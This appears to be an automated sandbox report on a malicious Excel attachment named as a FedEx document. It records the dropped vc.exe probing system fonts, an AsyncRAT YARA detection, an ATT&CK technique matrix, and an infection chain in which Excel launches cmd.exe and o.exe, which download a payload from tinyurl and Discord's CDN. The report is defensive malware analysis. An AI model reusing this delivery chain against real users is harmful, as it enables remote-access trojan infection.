      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
      Source: C:\Users\user\AppData\Roaming\vc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0125A093 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,14_2_0125A093
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0125D220 memset,GetVersionExW,GetVersionExW,14_2_0125D220
      Source: C:\Users\user\AppData\Local\Temp\o.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings:

      barindex
      Yara detected AsyncRATShow sources
      Source: Yara matchFile source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vc.exe PID: 4896, type: MEMORY
      Source: vc.exe, 00000020.00000002.534638947.0000000007643000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_01257732 SetErrorMode,CorBindToRuntimeEx,SysFreeString,14_2_01257732

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Spearphishing Link1Scripting11DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools11OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution13Scheduled Task/Job1Process Injection12Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Scheduled Task/Job1Scripting11Security Account ManagerSystem Information Discovery25SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsScheduled Task/Job1Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information12NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsSecurity Software Discovery111SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsVirtualization/Sandbox Evasion2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion2/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection12Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 320331 Sample: 1099008FEDEX_090887766.xls Startdate: 19/11/2020 Architecture: WINDOWS Score: 96 54 Multi AV Scanner detection for submitted file 2->54 56 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->56 58 Yara detected AsyncRAT 2->58 60 6 other signatures 2->60 8 EXCEL.EXE 71 35 2->8         started        process3 file4 48 C:\Users\...\1099008FEDEX_090887766.xls.LNK, MS 8->48 dropped 64 Obfuscated command line found 8->64 66 Document exploit detected (process start blacklist hit) 8->66 12 cmd.exe 1 8->12         started        15 cmd.exe 1 8->15         started        17 cmd.exe 1 8->17         started        19 3 other processes 8->19 signatures5 process6 signatures7 68 Obfuscated command line found 12->68 21 o.exe 15 18 12->21         started        26 conhost.exe 12->26         started        28 Robocopy.exe 3 2 15->28         started        30 conhost.exe 15->30         started        32 o.exe 17->32         started        34 conhost.exe 17->34         started        36 o.exe 18 19->36         started        38 conhost.exe 19->38         started        40 3 other processes 19->40 process8 dnsIp9 50 tinyurl.com 104.20.138.65, 443, 49733 CLOUDFLARENETUS United States 21->50 52 cdn.discordapp.com 162.159.129.233, 443, 49734 CLOUDFLARENETUS United States 21->52 44 C:\Users\user\Documents\vc.exe, PE32 21->44 dropped 62 Drops PE files to the document folder of the user 21->62 46 C:\Users\user\AppData\...\powershell.exe, PE32 28->46 dropped 42 vc.exe 32->42         started        file10 signatures11 process12

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      1099008FEDEX_090887766.xls15%ReversingLabsDocument-Word.Trojan.Heuristic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\powershell.exe0%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\powershell.exe0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://cdn.entity.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://wus2-000.contentsync.0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://powerlift.acompli.net0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://cortana.ai0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      http://www.sajatypeworks.com0%URL Reputationsafe
      https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.urwpp.deDPlease0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      http://www.zhongyicts.com.cn0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
